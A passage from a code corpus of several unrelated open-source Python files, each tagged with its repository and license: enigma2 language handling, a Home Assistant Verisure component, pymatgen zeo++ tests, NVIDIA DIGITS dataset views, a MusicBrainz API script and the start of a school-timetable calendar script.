self.addLanguage("Hrvatski", "hr", "HR", "ISO-8859-15")
self.addLanguage("Magyar", "hu", "HU", "ISO-8859-15")
self.addLanguage("Íslenska", "is", "IS", "ISO-8859-15")
self.addLanguage("Italiano", "it", "IT", "ISO-8859-15")
self.addLanguage("Kurdish", "ku", "KU", "ISO-8859-15")
self.addLanguage("Lietuvių", "lt", "LT", "ISO-8859-15")
self.addLanguage("Latviešu", "lv", "LV", "ISO-8859-15")
self.addLanguage("Nederlands", "nl", "NL", "ISO-8859-15")
self.addLanguage("Norsk Bokmål","nb", "NO", "ISO-8859-15")
self.addLanguage("Norsk", "no", "NO", "ISO-8859-15")
self.addLanguage("Polski", "pl", "PL", "ISO-8859-15")
self.addLanguage("Português", "pt", "PT", "ISO-8859-15")
self.addLanguage("Português do Brasil", "pt", "BR", "ISO-8859-15")
self.addLanguage("Romanian", "ro", "RO", "ISO-8859-15")
self.addLanguage("Русский", "ru", "RU", "ISO-8859-15")
self.addLanguage("Slovensky", "sk", "SK", "ISO-8859-15")
self.addLanguage("Slovenščina", "sl", "SI", "ISO-8859-15")
self.addLanguage("Srpski", "sr", "YU", "ISO-8859-15")
self.addLanguage("Svenska", "sv", "SE", "ISO-8859-15")
self.addLanguage("ภาษาไทย", "th", "TH", "ISO-8859-15")
self.addLanguage("Türkçe", "tr", "TR", "ISO-8859-15")
self.addLanguage("Ukrainian", "uk", "UA", "ISO-8859-15")
def addLanguage(self, name, lang, country, encoding):
try:
if lang in self.ll:
if country == "GB" or country == "BR":
if (lang + "_" + country) in self.ll:
self.lang[str(lang + "_" + country)] = ((name, lang, country, encoding))
self.langlist.append(str(lang + "_" + country))
else:
self.lang[str(lang + "_" + country)] = ((name, lang, country, encoding))
self.langlist.append(str(lang + "_" + country))
except:
print "Language " + str(name) + " not found"
self.langlistselection.append((str(lang + "_" + country), name))
def activateLanguage(self, index):
try:
lang = self.lang[index]
print "Activating language " + lang[0]
self.catalog = gettext.translation('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), languages=[index], fallback=True)
self.catalog.install(names=("ngettext", "pgettext"))
self.activeLanguage = index
for x in self.callbacks:
if x:
x()
except:
print "Selected language does not exist!"
# NOTE: we do not use LC_ALL, because LC_ALL will not set any of the categories, when one of the categories fails.
# We'd rather try to set all available categories, and ignore the others
for category in [locale.LC_CTYPE, locale.LC_COLLATE, locale.LC_TIME, locale.LC_MONETARY, locale.LC_MESSAGES, locale.LC_NUMERIC]:
try:
locale.setlocale(category, (self.getLanguage(), 'UTF-8'))
except:
pass
# HACK: sometimes python 2.7 reverts to the LC_TIME environment value, so make sure it has the correct value
os.environ["LC_TIME"] = self.getLanguage() + '.UTF-8'
os.environ["LANGUAGE"] = self.getLanguage() + '.UTF-8'
os.environ["GST_SUBTITLE_ENCODING"] = self.getGStreamerSubtitleEncoding()
def activateLanguageIndex(self, index):
if index < len(self.langlist):
self.activateLanguage(self.langlist[index])
def getLanguageList(self):
return [ (x, self.lang[x]) for x in self.langlist ]
def getLanguageListSelection(self):
return self.langlistselection
def getActiveLanguage(self):
return self.activeLanguage
def getActiveCatalog(self):
return self.catalog
def getActiveLanguageIndex(self):
idx = 0
for x in self.langlist:
if x == self.activeLanguage:
return idx
idx += 1
return None
def getLanguage(self):
try:
return str(self.lang[self.activeLanguage][1]) + "_" + str(self.lang[self.activeLanguage][2])
except:
return ''
def getGStreamerSubtitleEncoding(self):
try:
return str(self.lang[self.activeLanguage][3])
except:
return 'ISO-8859-15'
def addCallback(self, callback):
self.callbacks.append(callback)
def delLanguage(self, delLang = None):
from Components.config import config, configfile
from shutil import rmtree
lang = config.osd.language.value
if delLang:
print"DELETE LANG", delLang
if delLang == "en_US" or delLang == "de_DE":
print"Default Language can not be deleted !!"
return
elif delLang == "en_GB" or delLang == "pt_BR":
delLang = delLang.lower()
delLang = delLang.replace('_','-')
os.system("opkg remove --autoremove --force-depends " + Lpackagename + delLang)
else:
os.system("opkg remove --autoremove --force-depends " + Lpackagename + delLang[:2])
else:
print"Delete all lang except ", lang
ll = os.listdir(LPATH)
for x in ll:
if len(x) > 2:
if x != lang and x != "de":
x = x.lower()
x = x.replace('_','-')
os.system("opkg remove --autoremove --force-depends " + Lpackagename + x)
else:
if x != lang[:2] and x != "en" and x != "de":
os.system("opkg remove --autoremove --force-depends " + Lpackagename + x)
elif x == "pt":
if x != lang:
os.system("opkg remove --autoremove --force-depends " + Lpackagename + x)
os.system("touch /etc/enigma2/.removelang")
self.InitLang()
def updateLanguageCache(self):
t = localtime(time())
createdate = strftime("%d.%m.%Y %H:%M:%S", t)
f = open('/usr/lib/enigma2/python/Components/Language_cache.py','w')
f.write('# -*- coding: UTF-8 -*-\n')
f.write('# date: ' + createdate + '\n#\n\n')
f.write('LANG_TEXT = {\n')
for lang in self.langlist:
catalog = gettext.translation('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), languages=[str(lang)], fallback=True)
T1 = catalog.gettext("Please use the UP and DOWN keys to select your language. Afterwards press the OK button.")
T2 = catalog.gettext("Language selection")
T3 = catalog.gettext("Cancel")
T4 = catalog.gettext("Save")
f.write('"' + lang + '"' + ': {\n')
f.write('\t "T1"' + ': "' + T1 + '",\n')
f.write('\t "T2"' + ': "' + T2 + '",\n')
f.write('\t "T3"' + ': "' + T3 + '",\n')
f.write('\t "T4"' + ': "' + T4 + '",\n')
f.write('},\n')
f.write('}\n')
f.close
catalog = None
lang = None
language = Language()
| wetek-enigma/enigma2 | lib/python/Components/Language.py | Python | gpl-2.0 | 7,837 |
"""
components.verisure
~~~~~~~~~~~~~~~~~~~
Provides support for verisure components.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/verisure/
"""
import logging
import time
from datetime import timedelta
from homeassistant import bootstrap
from homeassistant.const import (
ATTR_DISCOVERED, ATTR_SERVICE, CONF_PASSWORD, CONF_USERNAME,
EVENT_PLATFORM_DISCOVERED)
from homeassistant.helpers import validate_config
from homeassistant.loader import get_component
from homeassistant.util import Throttle
DOMAIN = "verisure"
DISCOVER_SENSORS = 'verisure.sensors'
DISCOVER_SWITCHES = 'verisure.switches'
DISCOVER_ALARMS = 'verisure.alarm_control_panel'
DISCOVER_LOCKS = 'verisure.lock'
DEPENDENCIES = ['alarm_control_panel']
REQUIREMENTS = ['vsure==0.5.1']
_LOGGER = logging.getLogger(__name__)
MY_PAGES = None
ALARM_STATUS = {}
SMARTPLUG_STATUS = {}
CLIMATE_STATUS = {}
LOCK_STATUS = {}
MOUSEDETECTION_STATUS = {}
VERISURE_LOGIN_ERROR = None
VERISURE_ERROR = None
SHOW_THERMOMETERS = True
SHOW_HYGROMETERS = True
SHOW_ALARM = True
SHOW_SMARTPLUGS = True
SHOW_LOCKS = True
SHOW_MOUSEDETECTION = True
CODE_DIGITS = 4
# if wrong password was given don't try again
WRONG_PASSWORD_GIVEN = False
MIN_TIME_BETWEEN_REQUESTS = timedelta(seconds=1)
def setup(hass, config):
""" Setup the Verisure component. """
if not validate_config(config,
{DOMAIN: [CONF_USERNAME, CONF_PASSWORD]},
_LOGGER):
return False
from verisure import MyPages, LoginError, Error
global SHOW_THERMOMETERS, SHOW_HYGROMETERS,\
SHOW_ALARM, SHOW_SMARTPLUGS, SHOW_LOCKS, SHOW_MOUSEDETECTION,\
CODE_DIGITS
SHOW_THERMOMETERS = int(config[DOMAIN].get('thermometers', '1'))
SHOW_HYGROMETERS = int(config[DOMAIN].get('hygrometers', '1'))
SHOW_ALARM = int(config[DOMAIN].get('alarm', '1'))
SHOW_SMARTPLUGS = int(config[DOMAIN].get('smartplugs', '1'))
SHOW_LOCKS = int(config[DOMAIN].get('locks', '1'))
SHOW_MOUSEDETECTION = int(config[DOMAIN].get('mouse', '1'))
CODE_DIGITS = int(config[DOMAIN].get('code_digits', '4'))
global MY_PAGES
MY_PAGES = MyPages(
config[DOMAIN][CONF_USERNAME],
config[DOMAIN][CONF_PASSWORD])
global VERISURE_LOGIN_ERROR, VERISURE_ERROR
VERISURE_LOGIN_ERROR = LoginError
VERISURE_ERROR = Error
try:
MY_PAGES.login()
except (ConnectionError, Error) as ex:
_LOGGER.error('Could not log in to verisure mypages, %s', ex)
return False
update_alarm()
update_climate()
update_smartplug()
update_lock()
update_mousedetection()
# Load components for the devices in the ISY controller that we support
for comp_name, discovery in ((('sensor', DISCOVER_SENSORS),
('switch', DISCOVER_SWITCHES),
('alarm_control_panel', DISCOVER_ALARMS),
('lock', DISCOVER_LOCKS))):
component = get_component(comp_name)
_LOGGER.info(config[DOMAIN])
bootstrap.setup_component(hass, component.DOMAIN, config)
hass.bus.fire(EVENT_PLATFORM_DISCOVERED,
{ATTR_SERVICE: discovery,
ATTR_DISCOVERED: {}})
return True
def reconnect():
""" Reconnect to verisure mypages. """
try:
time.sleep(1)
MY_PAGES.login()
except VERISURE_LOGIN_ERROR as ex:
_LOGGER.error("Could not login to Verisure mypages, %s", ex)
global WRONG_PASSWORD_GIVEN
WRONG_PASSWORD_GIVEN = True
except (ConnectionError, VERISURE_ERROR) as ex:
_LOGGER.error("Could not login to Verisure mypages, %s", ex)
@Throttle(MIN_TIME_BETWEEN_REQUESTS)
def update_alarm():
""" Updates the status of alarms. """
update_component(MY_PAGES.alarm.get, ALARM_STATUS)
@Throttle(MIN_TIME_BETWEEN_REQUESTS)
def update_climate():
""" Updates the status of climate sensors. """
update_component(MY_PAGES.climate.get, CLIMATE_STATUS)
@Throttle(MIN_TIME_BETWEEN_REQUESTS)
def update_smartplug():
""" Updates the status of smartplugs. """
update_component(MY_PAGES.smartplug.get, SMARTPLUG_STATUS)
def update_lock():
""" Updates the status of alarms. """
update_component(MY_PAGES.lock.get, LOCK_STATUS)
def update_mousedetection():
""" Updates the status of mouse detectors. """
update_component(MY_PAGES.mousedetection.get, MOUSEDETECTION_STATUS)
def update_component(get_function, status):
""" Updates the status of verisure components. """
if WRONG_PASSWORD_GIVEN:
_LOGGER.error('Wrong password')
return
try:
for overview in get_function():
try:
status[overview.id] = overview
except AttributeError:
status[overview.deviceLabel] = overview
except (ConnectionError, VERISURE_ERROR) as ex:
_LOGGER.error('Caught connection error %s, tries to reconnect', ex)
reconnect()
| nnic/home-assistant | homeassistant/components/verisure.py | Python | mit | 5,074 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
__author__ = "Bharat Medasani"
__copyright__ = "Copyright 2013, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "bkmedasani@lbl.gov"
__date__ = "Aug 2, 2013"
import os
import re
import unittest
from pymatgen.analysis.bond_valence import BVAnalyzer
from pymatgen.core.periodic_table import Species
from pymatgen.core.structure import Molecule, Structure
from pymatgen.io.cif import CifParser
from pymatgen.io.vasp.inputs import Poscar
from pymatgen.io.zeopp import (
ZeoCssr,
ZeoVoronoiXYZ,
get_free_sphere_params,
get_high_accuracy_voronoi_nodes,
get_void_volume_surfarea,
get_voronoi_nodes,
)
from pymatgen.util.testing import PymatgenTest
try:
import zeo
except ImportError:
zeo = None
@unittest.skipIf(not zeo, "zeo not present.")
class ZeoCssrTest(unittest.TestCase):
def setUp(self):
filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
p = Poscar.from_file(filepath)
self.zeocssr = ZeoCssr(p.structure)
def test_str(self):
expected_string = """4.7595 10.4118 6.0672
90.00 90.00 90.00 SPGR = 1 P 1 OPT = 1
24 0
0 Fe4 P4 O16
1 Fe 0.4749 0.2187 0.7500 0 0 0 0 0 0 0 0 0.0000
2 Fe 0.9749 0.2813 0.2500 0 0 0 0 0 0 0 0 0.0000
3 Fe 0.0251 0.7187 0.7500 0 0 0 0 0 0 0 0 0.0000
4 Fe 0.5251 0.7813 0.2500 0 0 0 0 0 0 0 0 0.0000
5 P 0.4182 0.0946 0.2500 0 0 0 0 0 0 0 0 0.0000
6 P 0.9182 0.4054 0.7500 0 0 0 0 0 0 0 0 0.0000
7 P 0.0818 0.5946 0.2500 0 0 0 0 0 0 0 0 0.0000
8 P 0.5818 0.9054 0.7500 0 0 0 0 0 0 0 0 0.0000
9 O 0.7071 0.0434 0.7500 0 0 0 0 0 0 0 0 0.0000
10 O 0.7413 0.0966 0.2500 0 0 0 0 0 0 0 0 0.0000
11 O 0.2854 0.1657 0.0461 0 0 0 0 0 0 0 0 0.0000
12 O 0.2854 0.1657 0.4539 0 0 0 0 0 0 0 0 0.0000
13 O 0.7854 0.3343 0.5461 0 0 0 0 0 0 0 0 0.0000
14 O 0.7854 0.3343 0.9539 0 0 0 0 0 0 0 0 0.0000
15 O 0.2413 0.4034 0.7500 0 0 0 0 0 0 0 0 0.0000
16 O 0.2071 0.4566 0.2500 0 0 0 0 0 0 0 0 0.0000
17 O 0.7929 0.5434 0.7500 0 0 0 0 0 0 0 0 0.0000
18 O 0.7587 0.5966 0.2500 0 0 0 0 0 0 0 0 0.0000
19 O 0.2146 0.6657 0.0461 0 0 0 0 0 0 0 0 0.0000
20 O 0.2146 0.6657 0.4539 0 0 0 0 0 0 0 0 0.0000
21 O 0.7146 0.8343 0.5461 0 0 0 0 0 0 0 0 0.0000
22 O 0.7146 0.8343 0.9539 0 0 0 0 0 0 0 0 0.0000
23 O 0.2587 0.9034 0.7500 0 0 0 0 0 0 0 0 0.0000
24 O 0.2929 0.9566 0.2500 0 0 0 0 0 0 0 0 0.0000"""
self.assertEqual(str(self.zeocssr), expected_string)
def test_from_file(self):
filename = os.path.join(PymatgenTest.TEST_FILES_DIR, "EDI.cssr")
zeocssr = ZeoCssr.from_file(filename)
self.assertIsInstance(zeocssr.structure, Structure)
# @unittest.skipIf(not zeo, "zeo not present.")
class ZeoCssrOxiTest(unittest.TestCase):
def setUp(self):
filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
p = Poscar.from_file(filepath)
structure = BVAnalyzer().get_oxi_state_decorated_structure(p.structure)
self.zeocssr = ZeoCssr(structure)
def test_str(self):
expected_string = """4.7595 10.4118 6.0672
90.00 90.00 90.00 SPGR = 1 P 1 OPT = 1
24 0
0 Fe4 P4 O16
1 Fe3+ 0.4749 0.2187 0.7500 0 0 0 0 0 0 0 0 0.0000
2 Fe3+ 0.9749 0.2813 0.2500 0 0 0 0 0 0 0 0 0.0000
3 Fe3+ 0.0251 0.7187 0.7500 0 0 0 0 0 0 0 0 0.0000
4 Fe3+ 0.5251 0.7813 0.2500 0 0 0 0 0 0 0 0 0.0000
5 P5+ 0.4182 0.0946 0.2500 0 0 0 0 0 0 0 0 0.0000
6 P5+ 0.9182 0.4054 0.7500 0 0 0 0 0 0 0 0 0.0000
7 P5+ 0.0818 0.5946 0.2500 0 0 0 0 0 0 0 0 0.0000
8 P5+ 0.5818 0.9054 0.7500 0 0 0 0 0 0 0 0 0.0000
9 O2- 0.7071 0.0434 0.7500 0 0 0 0 0 0 0 0 0.0000
10 O2- 0.7413 0.0966 0.2500 0 0 0 0 0 0 0 0 0.0000
11 O2- 0.2854 0.1657 0.0461 0 0 0 0 0 0 0 0 0.0000
12 O2- 0.2854 0.1657 0.4539 0 0 0 0 0 0 0 0 0.0000
13 O2- 0.7854 0.3343 0.5461 0 0 0 0 0 0 0 0 0.0000
14 O2- 0.7854 0.3343 0.9539 0 0 0 0 0 0 0 0 0.0000
15 O2- 0.2413 0.4034 0.7500 0 0 0 0 0 0 0 0 0.0000
16 O2- 0.2071 0.4566 0.2500 0 0 0 0 0 0 0 0 0.0000
17 O2- 0.7929 0.5434 0.7500 0 0 0 0 0 0 0 0 0.0000
18 O2- 0.7587 0.5966 0.2500 0 0 0 0 0 0 0 0 0.0000
19 O2- 0.2146 0.6657 0.0461 0 0 0 0 0 0 0 0 0.0000
20 O2- 0.2146 0.6657 0.4539 0 0 0 0 0 0 0 0 0.0000
21 O2- 0.7146 0.8343 0.5461 0 0 0 0 0 0 0 0 0.0000
22 O2- 0.7146 0.8343 0.9539 0 0 0 0 0 0 0 0 0.0000
23 O2- 0.2587 0.9034 0.7500 0 0 0 0 0 0 0 0 0.0000
24 O2- 0.2929 0.9566 0.2500 0 0 0 0 0 0 0 0 0.0000"""
self.assertEqual(str(self.zeocssr), expected_string)
def test_from_file(self):
filename = os.path.join(PymatgenTest.TEST_FILES_DIR, "EDI_oxistate_decorated.cssr")
zeocssr = ZeoCssr.from_file(filename)
self.assertIsInstance(zeocssr.structure, Structure)
@unittest.skipIf(not zeo, "zeo not present.")
class ZeoVoronoiXYZTest(unittest.TestCase):
def setUp(self):
coords = [
[0.000000, 0.000000, 0.000000],
[0.000000, 0.000000, 1.089000],
[1.026719, 0.000000, -0.363000],
[-0.513360, -0.889165, -0.363000],
[-0.513360, 0.889165, -0.363000],
]
prop = [0.4, 0.2, 0.2, 0.2, 0.2]
self.mol = Molecule(["C", "H", "H", "H", "H"], coords, site_properties={"voronoi_radius": prop})
self.xyz = ZeoVoronoiXYZ(self.mol)
def test_str(self):
ans = """5
H4 C1
C 0.000000 0.000000 0.000000 0.400000
H 1.089000 0.000000 0.000000 0.200000
H -0.363000 1.026719 0.000000 0.200000
H -0.363000 -0.513360 -0.889165 0.200000
H -0.363000 -0.513360 0.889165 0.200000"""
self.assertEqual(str(self.xyz), ans)
self.assertEqual(str(self.xyz), ans)
def test_from_file(self):
filename = os.path.join(PymatgenTest.TEST_FILES_DIR, "EDI_voro.xyz")
vor = ZeoVoronoiXYZ.from_file(filename)
self.assertIsInstance(vor.molecule, Molecule)
@unittest.skipIf(not zeo, "zeo not present.")
class GetVoronoiNodesTest(unittest.TestCase):
def setUp(self):
filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
p = Poscar.from_file(filepath)
self.structure = p.structure
bv = BVAnalyzer()
valences = bv.get_valences(self.structure)
el = [site.species_string for site in self.structure.sites]
valence_dict = dict(zip(el, valences))
self.rad_dict = {}
for k, v in valence_dict.items():
self.rad_dict[k] = float(Species(k, v).ionic_radius)
assert len(self.rad_dict) == len(self.structure.composition)
def test_get_voronoi_nodes(self):
(
vor_node_struct,
vor_edge_center_struct,
vor_face_center_struct,
) = get_voronoi_nodes(self.structure, self.rad_dict)
self.assertIsInstance(vor_node_struct, Structure)
self.assertIsInstance(vor_edge_center_struct, Structure)
self.assertIsInstance(vor_face_center_struct, Structure)
print(len(vor_node_struct.sites))
print(len(vor_face_center_struct.sites))
@unittest.skip("file free_sph.cif not present")
class GetFreeSphereParamsTest(unittest.TestCase):
def setUp(self):
filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "free_sph.cif")
self.structure = Structure.from_file(filepath)
self.rad_dict = {
"Ge": 0.67,
"P": 0.52,
"S": 1.7,
"La": 1.17,
"Zr": 0.86,
"O": 1.26,
}
def test_get_free_sphere_params(self):
free_sph_params = get_free_sphere_params(self.structure, rad_dict=self.rad_dict)
# Zeo results can change in future. Hence loose comparison
self.assertAlmostEqual(free_sph_params["inc_sph_max_dia"], 2.58251, places=1)
self.assertAlmostEqual(free_sph_params["free_sph_max_dia"], 1.29452, places=1)
self.assertAlmostEqual(free_sph_params["inc_sph_along_free_sph_path_max_dia"], 2.58251, places=1)
@unittest.skipIf(not zeo, "zeo not present.")
class GetHighAccuracyVoronoiNodesTest(unittest.TestCase):
def setUp(self):
filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
p = Poscar.from_file(filepath)
self.structure = p.structure
bv = BVAnalyzer()
valences = bv.get_valences(self.structure)
el = [site.species_string for site in self.structure.sites]
valence_dict = dict(zip(el, valences))
self.rad_dict = {}
for k, v in valence_dict.items():
self.rad_dict[k] = float(Species(k, v).ionic_radius)
assert len(self.rad_dict) == len(self.structure.composition)
def test_get_voronoi_nodes(self):
# vor_node_struct, vor_ec_struct, vor_fc_struct = \
# get_high_accuracy_voronoi_nodes(self.structure, self.rad_dict)
vor_node_struct = get_high_accuracy_voronoi_nodes(self.structure, self.rad_dict)
self.assertIsInstance(vor_node_struct, Structure)
# self.assertIsInstance(vor_ec_struct, Structure)
# self.assertIsInstance(vor_fc_struct, Structure)
print(len(vor_node_struct.sites))
# print(len(vor_fc_struct.sites))
@unittest.skipIf(not zeo, "zeo not present.")
class GetVoronoiNodesMultiOxiTest(unittest.TestCase):
def setUp(self):
filepath = os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR")
p = Poscar.from_file(filepath)
self.structure = p.structure
bv = BVAnalyzer()
self.structure = bv.get_oxi_state_decorated_structure(self.structure)
valences = bv.get_valences(self.structure)
radii = []
for i in range(len(valences)):
el = self.structure.sites[i].specie.symbol
radius = Species(el, valences[i]).ionic_radius
radii.append(radius)
el = [site.species_string for site in self.structure.sites]
self.rad_dict = dict(zip(el, radii))
for el in self.rad_dict.keys():
print((el, self.rad_dict[el].real))
def test_get_voronoi_nodes(self):
(
vor_node_struct,
vor_edge_center_struct,
vor_face_center_struct,
) = get_voronoi_nodes(self.structure, self.rad_dict)
self.assertIsInstance(vor_node_struct, Structure)
self.assertIsInstance(vor_edge_center_struct, Structure)
self.assertIsInstance(vor_face_center_struct, Structure)
@unittest.skip("The function is deprecated")
class GetVoidVolumeSurfaceTest(unittest.TestCase):
def setUp(self):
filepath1 = os.path.join(PymatgenTest.TEST_FILES_DIR, "Li2O.cif")
p = CifParser(filepath1).get_structures(False)[0]
bv = BVAnalyzer()
valences = bv.get_valences(p)
el = [site.species_string for site in p.sites]
val_dict = dict(zip(el, valences))
self._radii = {}
for k, v in val_dict.items():
k1 = re.sub(r"[1-9,+,\-]", "", k)
self._radii[k1] = float(Species(k1, v).ionic_radius)
p.remove(0)
self._vac_struct = p
def test_void_volume_surface_area(self):
pass
vol, sa = get_void_volume_surfarea(self._vac_struct, self._radii)
# print "vol: ", vol, "sa: ", sa
self.assertIsInstance(vol, float)
self.assertIsInstance(sa, float)
if __name__ == "__main__":
unittest.main()
| gmatteo/pymatgen | pymatgen/io/tests/test_zeopp.py | Python | mit | 11,239 |
../../../../../share/pyshared/twisted/test/reflect_helper_IE.py | Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/twisted/test/reflect_helper_IE.py | Python | gpl-3.0 | 63 |
# Copyright (c) 2014-2015, NVIDIA CORPORATION. All rights reserved.
import os
import flask
from digits import utils
from digits.utils.routing import request_wants_json
from digits.webapp import app, scheduler, autodoc
from digits.dataset import tasks
from forms import ImageClassificationDatasetForm
from job import ImageClassificationDatasetJob
from digits.base_workspace import *
NAMESPACE = '/datasets/images/classification'
def from_folders(job, form):
"""
Add tasks for creating a dataset by parsing folders of images
"""
job.labels_file = utils.constants.LABELS_FILE
### Add ParseFolderTask
percent_val = form.folder_pct_val.data
val_parents = []
if form.has_val_folder.data:
percent_val = 0
percent_test = form.folder_pct_test.data
test_parents = []
if form.has_test_folder.data:
percent_test = 0
parse_train_task = tasks.ParseFolderTask(
job_dir = job.dir(),
folder = form.folder_train.data,
percent_val = percent_val,
percent_test = percent_test,
)
job.tasks.append(parse_train_task)
# set parents
if not form.has_val_folder.data:
val_parents = [parse_train_task]
if not form.has_test_folder.data:
test_parents = [parse_train_task]
if form.has_val_folder.data:
parse_val_task = tasks.ParseFolderTask(
job_dir = job.dir(),
parents = parse_train_task,
folder = form.folder_val.data,
percent_val = 100,
percent_test = 0,
)
job.tasks.append(parse_val_task)
val_parents = [parse_val_task]
if form.has_test_folder.data:
parse_test_task = tasks.ParseFolderTask(
job_dir = job.dir(),
parents = parse_train_task,
folder = form.folder_test.data,
percent_val = 0,
percent_test = 100,
)
job.tasks.append(parse_test_task)
test_parents = [parse_test_task]
### Add CreateDbTasks
encoding = form.encoding.data
job.tasks.append(
tasks.CreateDbTask(
job_dir = job.dir(),
parents = parse_train_task,
input_file = utils.constants.TRAIN_FILE,
db_name = utils.constants.TRAIN_DB,
image_dims = job.image_dims,
resize_mode = job.resize_mode,
encoding = encoding,
mean_file = utils.constants.MEAN_FILE_CAFFE,
labels_file = job.labels_file,
)
)
if percent_val > 0 or form.has_val_folder.data:
job.tasks.append(
tasks.CreateDbTask(
job_dir = job.dir(),
parents = val_parents,
input_file = utils.constants.VAL_FILE,
db_name = utils.constants.VAL_DB,
image_dims = job.image_dims,
resize_mode = job.resize_mode,
encoding = encoding,
labels_file = job.labels_file,
)
)
if percent_test > 0 or form.has_test_folder.data:
job.tasks.append(
tasks.CreateDbTask(
job_dir = job.dir(),
parents = test_parents,
input_file = utils.constants.TEST_FILE,
db_name = utils.constants.TEST_DB,
image_dims = job.image_dims,
resize_mode = job.resize_mode,
encoding = encoding,
labels_file = job.labels_file,
)
)
def from_files(job, form):
"""
Add tasks for creating a dataset by reading textfiles
"""
### labels
flask.request.files[form.textfile_labels_file.name].save(
os.path.join(job.dir(), utils.constants.LABELS_FILE)
)
job.labels_file = utils.constants.LABELS_FILE
encoding = form.encoding.data
shuffle = bool(form.textfile_shuffle.data)
### train
flask.request.files[form.textfile_train_images.name].save(
os.path.join(job.dir(), utils.constants.TRAIN_FILE)
)
image_folder = form.textfile_train_folder.data.strip()
if not image_folder:
image_folder = None
job.tasks.append(
tasks.CreateDbTask(
job_dir = job.dir(),
input_file = utils.constants.TRAIN_FILE,
db_name = utils.constants.TRAIN_DB,
image_dims = job.image_dims,
image_folder= image_folder,
resize_mode = job.resize_mode,
encoding = encoding,
mean_file = utils.constants.MEAN_FILE_CAFFE,
labels_file = job.labels_file,
shuffle = shuffle,
)
)
### val
if form.textfile_use_val.data:
flask.request.files[form.textfile_val_images.name].save(
os.path.join(job.dir(), utils.constants.VAL_FILE)
)
image_folder = form.textfile_val_folder.data.strip()
if not image_folder:
image_folder = None
job.tasks.append(
tasks.CreateDbTask(
job_dir = job.dir(),
input_file = utils.constants.VAL_FILE,
db_name = utils.constants.VAL_DB,
image_dims = job.image_dims,
image_folder= image_folder,
resize_mode = job.resize_mode,
encoding = encoding,
labels_file = job.labels_file,
shuffle = shuffle,
)
)
### test
if form.textfile_use_test.data:
flask.request.files[form.textfile_test_images.name].save(
os.path.join(job.dir(), utils.constants.TEST_FILE)
)
image_folder = form.textfile_test_folder.data.strip()
if not image_folder:
image_folder = None
job.tasks.append(
tasks.CreateDbTask(
job_dir = job.dir(),
input_file = utils.constants.TEST_FILE,
db_name = utils.constants.TEST_DB,
image_dims = job.image_dims,
image_folder= image_folder,
resize_mode = job.resize_mode,
encoding = encoding,
labels_file = job.labels_file,
shuffle = shuffle,
)
)
@app.route(NAMESPACE + '/new', methods=['GET'])
@autodoc('datasets')
def image_classification_dataset_new():
"""
Returns a form for a new ImageClassificationDatasetJob
"""
workspace = get_workspace_details(flask.request.url)
print "workspace is ", workspace
form = ImageClassificationDatasetForm()
return flask.render_template('datasets/images/classification/new.html', form=form, workspace = workspace)
@app.route(NAMESPACE + '.json', methods=['POST'])
@app.route(NAMESPACE, methods=['POST'])
@autodoc(['datasets', 'api'])
def image_classification_dataset_create():
"""
Creates a new ImageClassificationDatasetJob
Returns JSON when requested: {job_id,name,status} or {errors:[]}
"""
workspace = get_workspace_details(flask.request.url)
form = ImageClassificationDatasetForm()
if not form.validate_on_submit():
if request_wants_json():
return flask.jsonify({'errors': form.errors}), 400
else:
return flask.render_template('datasets/images/classification/new.html', form=form, workspace = workspace), 400
job = None
try:
job = ImageClassificationDatasetJob(
name = form.dataset_name.data,
image_dims = (
int(form.resize_height.data),
int(form.resize_width.data),
int(form.resize_channels.data),
),
resize_mode = form.resize_mode.data,
workspace = workspace,
)
if form.method.data == 'folder':
from_folders(job, form)
elif form.method.data == 'textfile':
from_files(job, form)
scheduler.add_job(job)
if request_wants_json():
return flask.jsonify(job.json_dict())
else:
return flask.redirect(flask.url_for('datasets_show', job_id=job.id())+'?workspace='+workspace['workspace_hash'])
except:
if job:
scheduler.delete_job(job)
raise
def show(job, *args):
"""
Called from digits.dataset.views.datasets_show()
"""
workspace = args[0]
return flask.render_template('datasets/images/classification/show.html', job=job, workspace = workspace)
| DESHRAJ/DIGITS | digits/dataset/images/classification/views.py | Python | bsd-3-clause | 9,125 |
# To experiment with this code freely you will have to run this code locally.
# We have provided an example json output here for you to look at,
# but you will not be able to run any queries through our UI.
# Importing the needed libraries
import json
import requests
# URL to use
URL = " http://musicbrainz.org/ws/2/artist/5b11f4ce-a62d-471e-81fc-a69a8278c7da?inc=aliases&fmt=json"
query_type = { "simple": {},
"atr": {"inc": "aliases+tags+ratings"},
"aliases": {"inc": "aliases"},
"releases": {"inc": "releases"}}
def query_site(url, params, uid="", fmt="json"):
params["fmt"] = fmt
r = requests.get(url + uid, params=params)
print "requesting", r.url
if r.status_code == requests.codes.ok:
return r.json()
else:
r.raise_for_status()
def query_by_name(url, params, name):
params["query"] = "artist:" + name
return query_site(url, params)
def pretty_print(data, indent=4):
if type(data) == dict:
print json.dumps(data, indent=indent, sort_keys=True)
else:
print data
def main():
results = query_by_name(URL, query_type["simple"], "Nirvana")
pretty_print(results)
artist_id = results["artists"][1]["id"]
print "\nARTIST:"
pretty_print(results["artists"][1])
artist_data = query_site(URL, query_type["releases"], artist_id)
releases = artist_data["releases"]
print "\nONE RELEASE:"
pretty_print(releases[0], indent=2)
release_titles = [r["title"] for r in releases]
print "\nALL TITLES:"
for t in release_titles:
print t
if __name__ == '__main__':
main()
| eneskemalergin/MongoDB | Lesson1/musicbrainz.py | Python | mit | 1,650 |
#!/usr/bin/env python
# Class Based implementation of the BHS calendar
from datetime import datetime as dt
from datetime import timedelta as td
import csv, re
from icalendar import Calendar, Event
# What period is at what time? eg. period 1 from 8:40 - 9:45
from new_schedule_times import reg, l1, l2, l3, l4, l5, lunch, \
plus_a_registration, plus_a_lunch, \
plus_an_hour, plus_half_an_hour, \
plus_a_lesson, plus_half_a_day, \
plus_a_working_day, timetable_path_n_file
def add_half_a_day(ical, a_day):
